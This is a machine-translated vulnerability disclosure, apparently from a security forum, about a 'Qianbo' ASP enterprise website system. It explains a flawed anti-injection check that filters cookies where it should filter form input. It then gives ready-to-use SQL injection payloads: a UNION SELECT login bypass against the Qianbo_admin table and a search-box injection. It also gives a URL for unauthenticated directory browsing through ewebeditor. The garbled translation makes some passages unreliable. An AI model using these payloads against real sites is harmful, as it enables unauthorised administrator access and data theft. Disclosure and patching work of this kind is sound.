Thousand Bo enterprise Station program, anti-injected into the statement where there is a little error!
Detail: If EnableStopInjection = True Then
If Request. QueryString <> "" Then Call StopInjection(Request. QueryString)
If Request. Cookies <> "" Then Call StopInjection(Request. Cookies)
If Request. Cookies <> "" Then Call StopInjection2(Request. Form)
Anti-start of injection or Encode, through the Echo of their decoding process, only to find out that here the surface of the cookie is empty the judge twice. Resulting in a Form of a malicious character submission.
Vulnerability to prove: a tasteless front Desk user login Md5 value is 1, The statement is written in the user name, the password write 1
'UNION Select 1,1,1,'a0b923820dcc509a',1,1,1,1,1,1,1,1,1,1,1,1,1,1,true,1,1,1 FROM Qianbo_admin Where "='
This tasteless the front landing can only reach the MemberLogin. asp 4 8 rows
If The UCase(LoginName) = The UCase(MemName) And LoginPassword = Password
LoginName take is just that the string statement, and the query results the user name is 1 so card in here.
http://www.xxxx.com /system/ewebeditor/asp/browse. asp? action=FOLDER&style=coolblue&cusdir=dir&type=FILE
Background ewebeditor not doing permissions verify, can lead visitors directly to browse
FCK can also be a column directory with local Test even on their Fck
The search box, enter
%' and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from Qianbo_admin where '%'='
A bunch of tasteless.
A variety of repair Ah, you know everything!!!